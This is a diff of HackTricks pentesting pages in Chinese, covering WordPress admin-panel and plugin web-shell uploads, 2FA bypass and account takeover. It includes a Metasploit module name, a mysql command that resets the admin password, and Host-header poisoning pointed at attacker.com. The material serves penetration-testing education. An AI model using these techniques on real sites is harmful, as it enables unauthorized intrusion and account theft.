if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
```
## **面板RCE**
## **面板 RCE**
**修改主题中使用的php文件(需要管理员凭据)**
**修改所用主题的 php需要管理员凭据**
外观 → 主题编辑器 → 404模板在右侧
外观 → 主题编辑器 → 404 模板(在右侧)
更改内容为php shell
将内容更改为 php shell
![](<../../.gitbook/assets/image (384).png>)
搜索互联网,找出如何访问更新后的页面。在这种情况下,您必须访问这里:[http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
在互联网上搜索如何访问该更新页面。在这种情况下,您必须访问这里: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
### MSF
@ -312,12 +312,14 @@ return new WP_Error(
```
use exploit/unix/webapp/wp_admin_shell_upload
```
## 插件RCE
to get a session.
### PHP插件
## 插件 RCE
可能可以将.php文件上传为插件。\
例如使用以下方式创建您的php后门
### PHP 插件
可能可以将 .php 文件作为插件上传。\
使用例如以下方法创建你的 php 后门:
![](<../../.gitbook/assets/image (183).png>)
@ -325,7 +327,7 @@ use exploit/unix/webapp/wp_admin_shell_upload
![](<../../.gitbook/assets/image (722).png>)
上传插件并点击立即安装
上传插件并按“立即安装”
![](<../../.gitbook/assets/image (249).png>)
@ -333,29 +335,29 @@ use exploit/unix/webapp/wp_admin_shell_upload
![](<../../.gitbook/assets/image (70).png>)
可能看起来不会有任何变化但如果您转到媒体您将看到您上传的shell
这可能表面上不会有什么反应,但如果你去媒体,你会看到你的 shell 已上传
![](<../../.gitbook/assets/image (462).png>)
访问它,您将看到执行反向shell的URL
访问它,你将看到执行反向 shell 的 URL
![](<../../.gitbook/assets/image (1006).png>)
### 上传和激活恶意插件
此方法涉及安装已知易受攻击且可被利用以获取Web shell的恶意插件。此过程通过WordPress仪表板执行如下
此方法涉及安装已知存在漏洞的恶意插件,并可以利用该漏洞获取 web shell。此过程通过 WordPress 仪表板进行,如下所示
1. **获取插件**从Exploit DB等来源获取插件例如[**此处**](https://www.exploit-db.com/exploits/36374)。
2. **安装插件**
* 转到WordPress仪表板然后转到`仪表板 > 插件 > 上传插件`
* 上传下载插件的zip文件。
3. **激活插件**一旦插件成功安装,必须通过仪表板激活。
1. **插件获取**:从 Exploit DB 等来源获取插件,如 [**这里**](https://www.exploit-db.com/exploits/36374)。
2. **插件安装**
* 导航到 WordPress 仪表板,然后转到 `仪表板 > 插件 > 上传插件`
* 上传下载插件的 zip 文件。
3. **插件激活**:插件成功安装,必须通过仪表板激活。
4. **利用**
* 安装并激活插件“reflex-gallery”后可以利用其已知易受攻击的漏洞。
* Metasploit框架提供了此漏洞的利用。通过加载适当的模块并执行特定命令可以建立一个meterpreter会话从而未经授权地访问站点
* 值得注意的是这只是利用WordPress站点的众多方法之一。
* 安装并激活插件“reflex-gallery”后可以利用它,因为已知存在漏洞。
* Metasploit 框架提供了该漏洞的利用工具。通过加载适当的模块并执行特定命令,可以建立 meterpreter 会话,从而获得对站点的未经授权访问
* 注意,这只是利用 WordPress 站点的众多方法之一。
内容包括描绘在WordPress仪表板中安装和激活插件步骤的视觉辅助。然而重要的是要注意未经授权地利用漏洞是非法和不道德的。这些信息应该负责任地使用只能在合法的情况下使用例如在明确获得许可的渗透测试中。
内容包括描述在 WordPress 仪表板中安装和激活插件步骤的视觉辅助工具。然而,重要的是要注意,以这种方式利用漏洞在没有适当授权的情况下是非法和不道德的。此信息应负责任地使用,仅在合法背景下使用,例如在获得明确许可的渗透测试中。
**有关更详细的步骤,请查看:** [**https://www.hackingarticles.in/wordpress-reverse-shell/\*\***](https://www.hackingarticles.in/wordpress-reverse-shell/)
@ -369,17 +371,17 @@ mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select
```bash
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
```
## WordPress保护
## WordPress 保护
### 定期更新
确保WordPress、插件和主题是最新的。还要确认在wp-config.php中启用了自动更新
确保 WordPress、插件和主题是最新的。还要确认在 wp-config.php 中启用了自动更新:
```bash
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
```
此外,**只安装可信赖的WordPress插件和主题**。
也**只安装可信的 WordPress 插件和主题**。
### 安全插件
@ -390,29 +392,31 @@ add_filter( 'auto_update_theme', '__return_true' );
### **其他建议**
* 删除默认的 **admin** 用户
* 使用 **强密码** 和 **双因素认证**
* 定期审查用户 **权限**
* 使用 **强密码** 和 **2FA**
* 定期 **审查** 用户 **权限**
* **限制登录尝试** 以防止暴力破解攻击
* 重命名 **`wp-admin.php`** 文件,并仅允许内部访问或特定IP地址访问。
* 重命名 **`wp-admin.php`** 文件,并仅允许内部或特定 IP 地址访问。
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) 轻松构建和 **自动化工作流程**,由全球 **最先进** 的社区工具提供支持。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的 **公司广告****下载PDF格式的HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索 [**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

134
pentesting-web/2fa-bypass.md
View file

@ -1,144 +1,147 @@
# 2FA/OTP Bypass
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以在以下网址检查他们的网站并尝试他们的引擎:{% embed url="https://whiteintel.io" %}
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
***
## **增强型两因素认证绕过技术**
## **增强的双因素认证绕过技术**
### **直接访问端点**
### **直接端点访问**
要绕过2FA直接访问后续端点了解路径至关重要。如果不成功请更改**引用者标头**以模拟从2FA验证页面导航。
要绕过 2FA直接访问后续端点了解路径至关重要。如果不成功请更改 **Referrer header** 以模拟从 2FA 验证页面的导航。
### **令牌重用**
在账户内重复使用先前使用的令牌进行身份验证可能有效
在账户内重用先前使用的令牌进行身份验证可能有效。
### **利用未使用的令牌**
尝试从自己的账户提取令牌以绕过另一个账户的2FA。
从自己的账户提取令牌以绕过另一个账户的 2FA 可以尝试
### **令牌暴露**
调查令牌是否在Web应用程序的响应中披露。
调查令牌是否在 Web 应用程序的响应中披露。
### **验证链接利用**
使用在账户创建时发送的**电子邮件验证链接**可以允许在没有2FA的情况下访问个人资料如详细[帖子](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b)中所述。
使用 **账户创建时发送的电子邮件验证链接** 可以在没有 2FA 的情况下访问个人资料,如详细 [帖子](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b) 中所述。
### **会话操**
### **会话操**
为用户和受害者的账户启动会话,并在不继续的情况下为用户的账户完成2FA允许尝试访问受害者账户流程的下一步利用后端会话管理限制。
为用户和受害者的账户启动会话,并在不继续的情况下完成用户账户的 2FA允许尝试访问受害者账户流程中的下一步利用后端会话管理的限制。
### **密码重置机制**
调查密码重置功能,该功能在重置后将用户登录到应用程序,以确定其是否允许使用相同链接进行多次重置至关重要。使用新重置的凭据登录可能绕过2FA。
调查密码重置功能,该功能在重置后将用户登录到应用程序,检查其是否允许使用相同链接进行多次重置。使用新重置的凭据登录可能绕过 2FA。
### **OAuth平台入侵**
### **OAuth 平台入侵**
入侵用户在受信任的**OAuth**平台例如Google、Facebook上的账户可以提供绕过2FA的途径。
入侵受信任的 **OAuth** 平台(例如Google、Facebook上的用户账户可以提供绕过 2FA 的途径。
### **暴力破解攻击**
### **暴力攻击**
#### **速率限制缺失**
#### **缺乏速率限制**
代码尝试次数没有限制会导致暴力破解攻击,尽管应考虑潜在的静默速率限制。
缺乏对代码尝试次数的限制允许进行暴力攻击,尽管应考虑潜在的静默速率限制。
#### **慢速暴力破解**
#### **慢速暴力攻击**
在存在流速限制但没有全局速率限制的情况下,慢速暴力破解攻击是可行的。
在存在流速限制而没有整体速率限制的情况下,慢速暴力攻击是可行的。
#### **代码重限制重置**
#### **代码重发限制重置**
新发送代码会重置速率限制,促进持续的暴力破解尝试。
发代码会重置速率限制,便于继续进行暴力尝试。
#### **客户端速率限制规避**
一份文件详细介绍了绕过客户端速率限制的技术。
文档详细说明了绕过客户端速率限制的技术。
#### **内部操作缺乏速率限制**
速率限制可能保护登录尝试,但不保护内部账户操作。
#### **短信代码重新发送成本**
#### **短信代码重发费用**
通过短信大量重新发送代码会给公司带来成本,尽管不会绕过2FA。
通过 SMS 过度重发代码会给公司带来费用,但不会绕过 2FA。
#### **无限OTP生成**
#### **无限 OTP 生成**
使用简单代码进行无限OTP生成允许通过重试一小组代码进行暴力破解
使用简单代码进行无限 OTP 生成允许通过重试一小组代码进行暴力攻击
### **竞争条件利用**
利用竞争条件进行2FA绕过可以在特定文件中找到。
利用竞争条件进行 2FA 绕过的技术可以在特定文档中找到。
### **CSRF/点击劫持漏洞**
探索CSRF或点击劫持漏洞以禁用2FA是一种可行的策略。
探索 CSRF 或点击劫持漏洞以禁用 2FA 是一种可行的策略。
### **“记住我”功能利用**
#### **可预测的Cookie值**
#### **可预测的 Cookie 值**
猜测“记住我”cookie值可以绕过限制。
猜测“记住我” cookie 值可以绕过限制。
#### **IP地址冒充**
#### **IP 地址冒充**
通过**X-Forwarded-For**标头冒充受害者的IP地址可以绕过限制。
通过 **X-Forwarded-For** header 冒充受害者的 IP 地址可以绕过限制。
### **利用旧版本**
#### **子域**
#### **子域**
测试子域可能使用不支持2FA的过时版本或包含有漏洞的2FA实现。
测试子域名可能使用缺乏 2FA 支持的过时版本或包含脆弱的 2FA 实现。
#### **API端点**
#### **API 端点**
通过/v\*目录路径指示的旧API版本可能容易受到2FA绕过方法的攻击。
旧的 API 版本,通过 /v\*/ 目录路径指示,可能容易受到 2FA 绕过方法的攻击。
### **处理先前会话**
2FA激活时终止现有会话可保护账户免受来自受损会话的未经授权访问。
2FA 激活时终止现有会话可以保护账户免受被入侵会话的未经授权访问。
### **带有备用代码的访问控制缺陷**
### **备份代码的访问控制缺陷**
2FA激活时立即生成备用代码并可能未经授权地检索备用代码尤其是在存在CORS配置错误/XSS漏洞的情况下会带来风险。
2FA 激活时立即生成和潜在未经授权检索备份代码,尤其是在 CORS 配置错误/XSS 漏洞的情况下,构成风险。
### **2FA页面上的信息披露**
### **2FA 页面信息泄露**
在2FA验证页面上披露敏感信息(例如电话号码)是一个问题。
2FA 验证页面上敏感信息泄露(例如电话号码)是一个问题。
### **密码重置禁用2FA**
### **密码重置禁用 2FA**
一个演示潜在绕过方法的过程涉及账户创建、2FA激活、密码重置和随后登录而无需2FA要求
一个展示潜在绕过方法的过程涉及账户创建、2FA 激活、密码重置和随后在没有 2FA 要求的情况下登录
### **诱饵请求**
利用诱饵请求来混淆暴力破解尝试或误导速率限制机制,为绕过策略增加另一层。制作这样的请求需要对应用程序的安全措施和速率限制行为有细致的理解。
利用诱饵请求来模糊暴力尝试或误导速率限制机制为绕过策略增加了另一层。制作此类请求需要对应用程序的安全措施和速率限制行为有细致的理解。
## 参考资料
## 参考文献
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
@ -147,10 +150,27 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以在以下网址检查他们的网站并尝试他们的引擎:{% embed url="https://whiteintel.io" %}
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
P
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

127
pentesting-web/account-takeover.md
View file

@ -1,37 +1,38 @@
# 账户接管
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## **授权问题**
应尝试更改账户的电子邮件,并检查确认过程是否**存在漏洞**。如果发现**存在弱点**,应将电子邮件更改为预期受害者的电子邮件,然后进行确认。
应尝试更改账户的电子邮件,并且必须检查确认过程。如果发现确认过程**薄弱**,则应将电子邮件更改为目标受害者的电子邮件并进行确认。
## **Unicode规范化问题**
## **Unicode 规范化问题**
1. 针对预期受害者`victim@gmail.com`的账户
2. 应使用Unicode创建一个账户\
1. 目标受害者的账户 `victim@gmail.com`
2. 应使用 Unicode 创建一个账户\
例如:`vićtim@gmail.com`
如[**此讲座**](https://www.youtube.com/watch?v=CiIyaZ3x49c)所述,之前的攻击也可以通过滥用第三方身份提供者来执行
正如在 [**这次演讲**](https://www.youtube.com/watch?v=CiIyaZ3x49c) 中所解释的,之前的攻击也可以通过滥用第三方身份提供者来实现
* 在第三方身份提供者中创建一个帐户使用类似受害者的电子邮件使用一些Unicode字符(`vićtim@company.com`)。
* 第三方提供者不应验证电子邮件
* 如果身份提供者验证电子邮件,也许您可以攻击域部分,例如:`victim@ćompany.com`,并注册该域希望身份提供者在受害者平台规范化域名时生成域的ascii版本
* 通过此身份提供者登录到应该规范化Unicode字符并允许您访问受害者账户的受害者平台
* 在第三方身份提供者中创建一个与受害者相似的电子邮件账户,使用某些 Unicode 字符(`vićtim@company.com`)。
* 第三方提供者不应验证电子邮件
* 如果身份提供者验证电子邮件,您可以攻击域部分,例如:`victim@ćompany.com`,并注册该域名,希望身份提供者生成域名的 ASCII 版本,而受害者平台规范化域名
* 通过此身份提供者登录受害者平台,受害者平台应规范化 Unicode 字符并允许您访问受害者账户
有关更多详细信息,请参阅关Unicode规范化的文档
有关更多详细信息,请参阅关Unicode 规范化的文档:
{% content-ref url="unicode-injection/unicode-normalization.md" %}
[unicode-normalization.md](unicode-injection/unicode-normalization.md)
@ -39,41 +40,41 @@
## **重用重置令牌**
如果目标系统允许**重用重置链接**,应努力使用诸如`gau`、`wayback`或`scan.io`等工具**查找更多重置链接**。
如果目标系统允许**重置链接被重用**,应努力使用 `gau`、`wayback` 或 `scan.io` 等工具**查找更多重置链接**。
## **账户接管**
## **账户接管**
1. 应使用受害者的电子邮件在平台上注册,并设置密码(尽管无法访问受害者的电子邮件可能会使此操作无法完成)。
2. 应等待受害者使用OAuth注册并确认账户。
3. 希望常规注册将得到确认,从而允许访问受害者的账户。
1. 应使用受害者的电子邮件在平台上注册,并设置密码(应尝试确认,尽管缺乏对受害者电子邮件的访问可能使这变得不可能)。
2. 应等待受害者使用 OAuth 注册并确认账户。
3. 希望常规注册将确认,从而允许访问受害者的账户。
## **CORS配置错误导致账户接管**
## **CORS 配置错误导致账户接管**
如果页面包含**CORS配置错误**,您可能能够从用户那里**窃取敏感信息**,以**接管他的账户**或让他更改认证信息以达到相同的目的:
如果页面包含**CORS 配置错误**,您可能能够**窃取用户的敏感信息**以**接管他的账户**或使他更改身份验证信息以达到同样的目的:
{% content-ref url="cors-bypass.md" %}
[cors-bypass.md](cors-bypass.md)
{% endcontent-ref %}
## **CSRF导致账户接管**
## **CSRF 导致账户接管**
如果页面容易受到CSRF攻击您可能能够让用户修改他的密码、电子邮件或认证信息然后访问该信息
如果页面易受 CSRF 攻击,您可能能够使**用户修改他的密码**、电子邮件或身份验证,以便您可以访问它
{% content-ref url="csrf-cross-site-request-forgery.md" %}
[csrf-cross-site-request-forgery.md](csrf-cross-site-request-forgery.md)
{% endcontent-ref %}
## **XSS导致账户接管**
## **XSS 导致账户接管**
如果在应用程序中发现XSS漏洞您可能能够窃取cookie、本地存储或网页信息从而接管账户
如果在应用程序中发现 XSS您可能能够窃取 cookies、本地存储或网页信息,从而使您能够接管账户:
{% content-ref url="xss-cross-site-scripting/" %}
[xss-cross-site-scripting](xss-cross-site-scripting/)
{% endcontent-ref %}
## **同源+Cookies**
## **同源 + Cookies**
如果发现有限的XSS或子域接管您可以操作cookie例如固定它们尝试破坏受害者账户:
如果您发现有限的 XSS 或子域名接管,您可以操作 cookies例如固定它们以尝试妥协受害者账户:
{% content-ref url="hacking-with-cookies/" %}
[hacking-with-cookies](hacking-with-cookies/)
@ -85,11 +86,11 @@
[reset-password.md](reset-password.md)
{% endcontent-ref %}
## **响应操**
## **响应操**
如果身份验证响应可以**简化为一个简单的布尔值**只需尝试将false更改为true看看是否获得任何访问权限。
如果身份验证响应可以**简化为一个简单的布尔值,只需尝试将 false 改为 true**,看看您是否获得任何访问权限。
## OAuth账户接管
## OAuth 导致账户接管
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
@ -97,51 +98,53 @@
## 主机头注入
1. 在发起密码重置请求时修改主机头。
2. 将`X-Forwarded-For`代理头更改为`attacker.com`。
3. 同时将主机、引用者和来源头更改为`attacker.com`
4. 在发起密码重置后选择重新发送邮件时,应用所有上述方法。
1. 在发起密码重置请求后,修改 Host 头。
2. 将 `X-Forwarded-For` 代理头更改为 `attacker.com`
3. 同时将 Host、Referrer 和 Origin 头更改为 `attacker.com`
4. 在发起密码重置并选择重新发送邮件后,采用上述三种方法。
## 响应操
## 响应操
1. **代码操纵**:将状态代码更改为`200 OK`
2. **代码和主体操**
* 将状态代码更改为`200 OK`。
* 修改响应主体为`{"success":true}`或空对象`{}`
1. **代码操控**:将状态代码更改为 `200 OK`
2. **代码和主体操**
* 将状态代码更改为 `200 OK`
* 将响应主体修改为 `{"success":true}` 或空对象 `{}`
这些操纵技术在使用JSON进行数据传输和接收的情况下非常有效。
这些操控技术在使用 JSON 进行数据传输和接收的场景中有效。
## 更改当前会话的电子邮件
根据[此报告](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)
来自 [这份报告](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)
* 攻击者请求将其电子邮件更改为新电子邮件
* 攻击者收到确认更改电子邮件的链接
* 攻击者向受害者发送链接,以便他点击
* 受害者的电子邮件更改为攻击者指定的电子邮件
* 攻击者可以恢复密码并接管账户
* 攻击者请求将其电子邮件更改为新电子邮件
* 攻击者收到确认更改电子邮件的链接
* 攻击者将链接发送给受害者以便其点击。
* 受害者的电子邮件被更改为攻击者指示的电子邮件。
* 攻击者可以恢复密码并接管账户
这也发生在[**此报告**](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)中。
这也发生在 [**这份报告**](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea) 中。
### 旧Cookie
### 旧 Cookies
如[**此文章**](https://medium.com/@niraj1mahajan/uncovering-the-hidden-vulnerability-how-i-found-an-authentication-bypass-on-shopifys-exchange-cc2729ea31a9)所述可以登录到一个账户将cookie保存为已认证用户,注销,然后再次登录。\
随着新的登录尽管可能会生成不同的cookie但旧的cookie仍然可以继续使用。
正如 [**在这篇文章中**](https://medium.com/@niraj1mahajan/uncovering-the-hidden-vulnerability-how-i-found-an-authentication-bypass-on-shopifys-exchange-cc2729ea31a9) 所解释的,可以登录到一个账户,保存 cookies 作为已认证用户,注销,然后再次登录。\
在新的登录中,尽管可能生成不同的 cookies但旧的 cookies 又开始工作。
## 参考资料
## 参考文献
* [https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050](https://infosecwriteups.com/firing-8-account-takeover-methods-77e892099050)
* [https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea](https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
